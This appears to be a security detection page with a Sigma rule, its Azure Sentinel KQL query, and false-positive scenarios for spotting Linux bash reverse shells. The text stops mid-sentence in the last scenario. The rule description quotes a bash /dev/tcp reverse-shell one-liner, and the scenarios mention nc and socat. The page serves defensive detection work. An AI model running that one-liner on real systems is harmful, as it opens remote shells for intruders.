The Linux Reverse Shell Indicator detects adversaries establishing a reverse shell connection to a remote server, which is a common technique used to maintain command and control over a compromised system. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate potential persistent access and exfiltration activities early.
Detection Rule
title: Linux Reverse Shell Indicator
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
status: test
description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
references:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
author: Florian Roth (Nextron Systems)
date: 2021-10-16
modified: 2022-12-25
tags:
- attack.execution
- attack.t1059.004
logsource:
product: linux
category: network_connection
detection:
selection:
Image|endswith: '/bin/bash'
filter:
DestinationIp:
- '127.0.0.1'
- '0.0.0.0'
condition: selection and not filter
falsepositives:
- Unknown
level: critical
imNetworkSession
| where (SrcProcessName endswith "/bin/bash" or DstProcessName endswith "/bin/bash") and (not((DstIpAddr in~ ("127.0.0.1", "0.0.0.0"))))Scenario: Scheduled Job Using bash for Log Rotation or System Maintenance
Description: A legitimate system maintenance script or log rotation job uses bash to execute commands that involve redirection to a local file, which might resemble a reverse shell pattern.
Filter/Exclusion: Exclude processes associated with known log rotation tools like logrotate or system maintenance scripts located in /etc/cron.d/ or /etc/cron.hourly/.
Scenario: Admin Using bash with Redirection for Debugging or Output Capture
Description: A system administrator might use bash with redirection (e.g., bash -c "some command" > /tmp/output.log 2>&1) to capture output for debugging or auditing purposes.
Filter/Exclusion: Exclude processes where the command line includes redirection to files in standard log directories like /var/log/, /tmp/, or /dev/null.
Scenario: Using bash with nc (Netcat) for Internal Communication
Description: A legitimate internal tool like nc (Netcat) might be used to establish a reverse shell between internal systems for troubleshooting or remote administration.
Filter/Exclusion: Exclude processes where the command includes nc or netcat and the destination IP is within the internal network range (e.g., 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16).
Scenario: Using bash with socat for Secure Tunneling or Port Forwarding
Description: A security tool like socat might be used to create tunnels or forward ports, which could involve bash in the command chain.
Filter/Exclusion: Exclude processes where